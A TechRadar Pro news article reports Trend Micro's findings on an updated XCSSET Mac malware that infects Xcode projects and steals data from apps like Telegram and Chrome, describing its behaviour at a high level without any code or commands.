This devious Mac malware has developers in its crosshairs

But experts say they may have cracked latest Mac malware

When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.

Malwareanalysts have shared new details about the infamousXCSSET malwarethat targetsMacdevices around the world.

XCSSET first came into the spotlight in August 2020, when it was spotted insideAppleprojects developed using the free Xcode integrated development environment (IDE). Avariantof the malware was then discovered designed specifically to targetM1-powered Macs.

Now,cybersecurityresearchers atTrend Microhave once again found an updated version of the malware that’s taken on new features and can target popular apps including Telegram andGoogle Chrome.

We’re looking at how our readers use VPNs with streaming sites like Netflix so we can improve our content and offer better advice. This survey won’t take more than 60 seconds of your time, and you can also choose to enter the prize draw to win a $100 Amazon voucher or one of five 1-year ExpressVPN subscriptions.

Click here to start the survey in a new window«

“The changes we’ve encountered in XCSSET do not reflect a fundamental change in its behavior but do constitute refinements in its tactics,” note the researchers in ablog postanalyzing XCSSET’s information stealing capabilities.

Targeting developers

The XCSSET malware is particularly troublesome since its infection mechanism can be used to launch supply-chain-like attacks.

The malware works by injecting malicious code into local Xcode projects, which executes every time the project is built. This poses an issue not just for the developers, but also for any downstream users that run the software infected with the malware.

Trend Micro has been monitoring the malware since last year and recently learnt how it steals information. Using the examples of Telegram andGoogleChrome, the researchers explained how the malware exfiltrates information to its command and control (C2) servers.

Are you a pro? Subscribe to our newsletter

Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!

“Not all executable files are sandboxed on macOS, which means a simple script can steal all the data stored in the sandbox directory,” say the researchers, asking application developers not to store sensitive data, such as login information, in the sandbox directory.

Besides Telegram, and Chrome, Trend Micro also found scripts that targeted other popular apps as well includingOpera,Skype,Evernote, WeChat, and more.

With almost two decades of writing and reporting on Linux, Mayank Sharma would like everyone to think he’sTechRadar Pro’sexpert on the topic. Of course, he’s just as interested in other computing topics, particularly cybersecurity, cloud, containers, and coding.

A critical Palo Alto Networks bug is being hit by cyberattacks, so patch now

3 reasons why PIA fell in our best VPN rankings

Alt + Tab trouble: Windows 11’s 24H2 update turns time-saving shortcut into ten-second headache